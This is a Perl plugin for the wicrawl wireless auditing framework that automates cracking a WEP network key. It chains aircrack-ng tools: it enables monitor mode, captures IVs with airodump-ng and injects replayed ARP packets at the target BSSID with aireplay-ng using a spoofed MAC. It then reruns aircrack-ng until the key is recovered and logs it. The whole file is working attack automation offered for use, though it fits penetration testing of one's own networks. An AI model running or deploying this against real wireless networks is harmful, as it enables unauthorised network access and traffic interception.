#!/usr/bin/perl -w
#
# This is a plugin that will try to crack wep with aircrack-ng.  It will spawn
# threads to handle:
#		- Dumping the IVs
#		- Trying to inject ARP
#		- Actually doing the cracking
#
# http://midnightresearch.com/projects/wicrawl
#
# Plugin Written by: Aaron Peterson 
# aircrack-ng Written by:  These guys: http://aircrack-ng.org/
#                          The original code is by Christophe Devine
# 
# aircrack-ng availabile here: http://aircrack-ng.org/
# Thanks to those guys for doing all the hard work, =)

$|=1;
use strict;
use Getopt::Std;
use File::Basename;
use POSIX ":sys_wait_h";
use Fcntl;
$Getopt::Std::STANDARD_HELP_VERSION='1';

my $bssid=0; my $encryption=""; my $ssid=0; my $interface=0; my $nick=0; my $version=0; my $run=0;
our($opt_b, $opt_e, $opt_i, $opt_s, $opt_n, $opt_r, $opt_v);
getopts ("b:e:i:n:r:s:v:");

if(    (!defined $opt_b) || (!defined $opt_i)
    || (!defined $opt_n) || (!defined $opt_s)
    || (!defined $opt_v) || (!defined $opt_e)
    || (!defined $opt_r)) {
  print "  [!] usage $0 <options>\n";
  print "\t-b <bssid>\n";
  print "\t-e <encryption type>\n";
  print "\t-i <interface>\n";
  print "\t-n <nickname>\n";
  print "\t-s <ssid>\n";
  print "\t-r <run>\n";
  print "\t-v <version>\n";
  exit 1;
}

$bssid =      $opt_b if(defined $opt_b);
$encryption = $opt_e if(defined $opt_e);
$ssid =       $opt_s if(defined $opt_s);
$interface =  $opt_i if(defined $opt_i);
$nick =       $opt_n if(defined $opt_n);
$run =        $opt_r if(defined $opt_r);
$version =    $opt_v if(defined $opt_v);


my $pcapfile=$ENV{'WICRAWL_PCAPFILE'};
my $basedir=dirname($0);
my $aircrackdir=$basedir . "/aircrack-ng-0.6.1";
my $aircrack=$aircrackdir . "/aircrack-ng";
my $airmon=$aircrackdir . "/airmon-ng";
my $aireplay=$aircrackdir . "/aireplay-ng";
my $airodump=$aircrackdir . "/airodump-ng";
my $logfile="/dev/null";
my $forksleep=4;
my $ivsfile=`umask 077 && mktemp -q "/tmp/aircrack.XXXXXX" 2>/dev/null`;
chomp($ivsfile);
my $time=time;
my $channel;

# Debug level for now...
my $verbosity=1;


if( ( ! -x $aircrack) || ( ! -x $airmon) || ( ! -x $airodump) || ( ! -x $aireplay) ) {
	print " [!!] An aircrack file is missing or not executable, looking for:\n";
	print "\t[$aircrack]\n";
	print "\t[$airmon]\n";
	print "\t[$airodump]\n";
	print "\t[$aireplay]\n";
	print " Exiting now..\n";
	exit 1;
}

# keep track of these so we can clean up as needed
my %pids=(
          "dump" => 0,
          "crack" => 0,
          "inject" => 0
         );

#######################################################################
# function wait_children - cleans up after the kids.
#   Arugments:  0 to cleanup children (but not blocking wait), 
#               1 to kill children, and make sure their gone.
#   Returns: 0
#####################
sub wait_children {
  my $iskill=shift(@_);

	if($iskill eq "CHLD") {
		lprint(0,3, "Received SIGCHLD, checking the forked children\n");
		$iskill=0;
	}

	if(!defined($iskill)) {
		$iskill=0;
	}

  my $kid; my $pid;

  foreach my $key (keys %pids) {
    $pid=$pids{$key};

    # no child
    next if ($pid <= 0);

    if($iskill==0) {

			# Don't block
      $kid=waitpid($pid, WNOHANG);

			if($kid > 0 ) {
				lprint(0,2, "Child [$key] pid [$pid] finished. (wait returned [$kid])\n");
			}
    } else {
      lprint(0, 3, "Killing child [$key] pid [$pid]\n");
      kill_pid($pid);
			$pids{$key}=0;
    }

  }

  lprint(1, 2, "Children all tucked into bed.\n");
  return 0;
}
#######################################################################
# function kill_pid - kill the given pid.
#   Arguments:  pid
####################
sub kill_pid() {
  my $child=shift(@_);

  my $have_child=1;
  my $count=0;

	# this is what the pgroup is set to
	$child="-" . $child;
  while($have_child) {
    my $kid=waitpid($child, WNOHANG);
    last if($kid > 0);

    kill(2, $child);
    sleep 1;
		$count++;
		if($count>=3) {
			lprint(1,2, "Child [$child] not dying, killing with force..\n");
			kill(9, $child);
			last;
		}
  }

	lprint(0, 2, "Child [$child] was killed\n");

  return 0;
}
#######################################################################
# function lprint - log print function
#   Arugments: type of message (int), loglevel (int), string of $msg
#   Returns: 0
#   Notes:
#     Loglevels are:
#       0 = Errors and fatal  (Always shown, -q for quiet)
#       1 = Default logging   (default log level)
#       2 = More info         (-v)
#       3 = All info          (-vv)
#     Message Types are:
#       0 = Info
#       1 = Notice
#       2 = Error
####################
sub lprint {
  my $type=shift(@_);
  my $loglevel=shift(@_);
  my $msg=shift(@_);
  my $chr="-";

  # set the prefix character: '!' is err, '*' is notice
  if ($type==1) {
    $chr="*";
  } elsif ($type==2) {
    $chr="!";
  }

  # generate the prefix chars
  my $num=($loglevel==3) ? 2 : $loglevel;
  $chr=" "x$num . "[" . "$chr"x(3-$num) . "]";

  # print if loglevel is high enough
  if($loglevel <= $verbosity) {
    $msg="$chr $msg";
    print $msg;
  }

  # log everything
  open(LOG, ">>$logfile") || die "  [!!!] Can't open logfile $logfile\n";
  print LOG $msg;
  close(LOG) || die "  [!!!] Can't close logfile $logfile\n";

  return 0;
}
#######################################################################
# function cleanup - run to cleanup on sigint, etc
####################
sub cleanup() {
	my $msg = shift(@_);

	if((defined($msg)) && ($msg eq "INT")) {
		lprint(2, 1, "Process [$$] received interrupt, cleaning up\n");
	} else {
		lprint(2, 1, "Process [$$] was told to clean up\n");
	}

  wait_children(1);
  #unlink($ivsfile);
  lprint(1, 1, "Aircrack wicrawl plugin done.\n");
  exit 0;

}
# End functions
##########################################################

$SIG{'INT'}= \&cleanup;
#$SIG{CHLD} = \&wait_children;

if(defined($ENV{'WICRAWL_CHANNEL'})) {
	$channel=$ENV{'WICRAWL_CHANNEL'};
} else {
	$channel=11;
}

lprint(1,1, "Aircrack WEP cracking pluging starting...\n");

# TODOTODO make signal handler

# Set in monitor mode:
`$airmon start $interface 2>/dev/null`;
my $rc=$? >> 8;

if($rc != 0) {
	lprint(2, 0, "Monitor mode enabling failed for aircrack plugin\n\t(warn: $!)\n");
	exit 1;
}
	
my $pid;
# Create dump child
if(($pid=fork) > 0) {
	# is parent -- We'll fork and (almost) forget this one

	lprint(1,1, "Spawned IV gathering/dumping process [$pid] from parent [$$]\n");
	$pids{"dump"}=$pid;

} elsif($pid==0) {
	# is child

	# reset signal handler
	$SIG{'INT'} = 'DEFAULT';

	my $system="$airodump --ivs --channel $channel -w $ivsfile $interface >/dev/null 2>&1";
	lprint(0,2, "Airodump child running:\n\t[$system]\n");

	# Reset the process group so that when the child sends a TERM
	# to the whole group, the parent doesn't die...
	setpgrp($$, $$) || die " [!!] Can't set process group for [$$]\n";

	# Make sure it doesn't kill the child thread too
	$SIG{'TERM'}='IGNORE';

	# Don't care about the output, we just want it not to fail
	`$system`;
	$rc=$? >> 8;

	$SIG{'TERM'}='DEFAULT';


	if($rc != 0) {
		lprint(2, 0, "Running [$airodump] on interface [$interface] failed\n\t(warn: $!)\n");
		exit 1;
	} else {
		exit 0;
	}

	exit 0;

} else {
	lprint(2,1, "Airodump fork failed..\n");
	exit 1;
}

# Apparently, this is what aircrack sticks on the end of filename of what you pass it
# Hopefully our filenames are random enough not to collide.  From here on out, this is
# how we refer to it
$ivsfile=$ivsfile . "-01.ivs";

lprint(1,2, "Sleeping [$forksleep] seconds to let monitoring process start\n");
sleep $forksleep;

# Create aireplay child
if(($pid=fork) > 0) {
	# is parent -- We'll fork and (almost) forget this one

	lprint(1,1, "Spawned aireplay arp injection process [$pid] from parent [$$]\n");
	$pids{"inject"}=$pid;

} elsif($pid==0) {
	# is child

  # reset signal handler
  $SIG{'INT'} = 'DEFAULT';

	my $system="$aireplay -b $bssid -a $bssid -i $interface --arpreplay -h 00:00:de:ad:be:ef $interface >/dev/null 2>&1";
	lprint(0,2, "Aireplay child running:\n\t[$system]\n");

	# Reset the process group so that when the child sends a TERM
	# to the whole group, the parent doesn't die...
	setpgrp($$, $$) || die " [!!] Can't set process group for [$$]\n";

	# Make sure it doesn't kill the child thread too
	$SIG{'TERM'}='IGNORE';

	# Don't care about the output, we just want it not to fail
	`$system`;
	$rc=$? >> 8;

	$SIG{'TERM'}='DEFAULT';

	if($rc != 0) {
		lprint(2, 0, "Running [$aireplay] on interface [$interface] failed\n\t(warn: $!)\n");
		exit 1;
	} else {
		exit 0;
	}

	exit 0;

} else {
	lprint(2,1, "Aireplay fork failed..\n");
	exit 1;
}

# open pipe
pipe(PARENT_RDR, CHILD_WTR);

# Get flags
my $flags=fcntl(PARENT_RDR, F_GETFL, 0);

# Add nonblock flag
$flags |= O_NONBLOCK;

# Set flags
fcntl(PARENT_RDR, F_SETFL, $flags);

my $wepkey;
my $success=0;
my $runonce=0;

lprint(1,1, "Starting aircrack now, this might take a bit...\n");

while($runonce == 0) {
	# Create aircrack child
	if(($pid=fork) > 0) {
		# is parent
		
		lprint(1,2, "Spawned aircrack process [$pid] from parent [$$]\n");
		$pids{"crack"}=$pid;

		sleep 1;
		$wepkey="";

		while($wepkey eq ""){

			my $kid=waitpid($pid, WNOHANG);

			if ($kid > 0) {
				# get message from the child
				# child was reaped by waitpid
				
				$wepkey=<PARENT_RDR>;
				$wepkey="FAILED: No message" if(!defined($wepkey));
				
				if(($wepkey =~ m/FAILED/i) || ($wepkey eq "-1")) {
					lprint(2, 2, "Child WEP Cracker [$pid] failed... message: [$wepkey].\n");
					lprint(2, 2, "Will try again, this might take a few tries to get enough packets...\n");
					$wepkey="Failed";
				} else {
					lprint(1, 1, "Child WEP Cracker [$pid] found WEP key!!!! [$wepkey]\n");
					$success=1;
					$runonce=1;
				}

			} elsif ($kid == -1) {
				# Process previously died

				lprint(2, 2, "Child WEP Cracker [$pid] was killed [$wepkey]\n");
				$wepkey="Failed";

			} else {
				lprint(0, 3, "Child [$pid] still running\n");
				$runonce=1;
				$wepkey="";
				sleep 5;
			}

			sleep 1 if($wepkey eq "");
		}

	} elsif($pid==0) {
		# is child

		my $msg="";

		my $system="$aircrack -q -b $bssid -a 1 $ivsfile 2>&1";
		lprint(0,2, "Aircrack child running:\n\t[$system]\n");

		# Reset the process group so that when the child sends a TERM
		# to the whole group, the parent doesn't die...
		setpgrp($$, $$) || die " [!!] Can't set process group for [$$]\n";

		# Make sure it doesn't kill the child thread too
		$SIG{'TERM'}='IGNORE';

		my $output=`$system`;

		#print "debug: output is [$output]\n";

		$SIG{'TERM'}='DEFALT';

		$rc=$? >> 8;

		if ($rc != 0) {
			lprint(2,2, "Aircrack failed to run...\n\t(warn: $!)\n");
		} 

		# Some of the common messaes...
		if($output =~ m/KEY FOUND! \[ (.*)\s.*$/) {
			$msg=$1;
		} elsif($output =~ m/Not enough IVs available/) {
			$msg="FAILED: Not enough IVs available";

		} elsif($output =~ m/No networks found/) {
			$msg="FAILED: No appropriate networks found";

		} else {
			$msg="FAILED: Unknown failure message";
			lprint(0,3, "Output was [$output]\n");
		}

		# Tell the parent what we've been up to.
		print CHILD_WTR $msg;

		exit 0;

	} else {
		lprint(2,1, "Aircrack fork failed..\n");
		exit 1;
	}

	sleep 1 if($runonce==0);
}


my $runtime=time - $time;

cleanup();
if($success==1) {
	lprint(1,1, "Aircrack successfully cracked [$ssid], key is [$wepkey]\n\tRuntime was [$runtime] seconds\n\tDone.\n");
	exit 8;
} else {
	lprint(2,1, "Aircrack failed to crack [$ssid]\n\tRuntime was [$runtime] seconds\n\tDone.\n");
	exit 1;
}

# TODOTODO Need to actually associate now...

exit 0;

# vim:ts=2:sw=2:sts=0
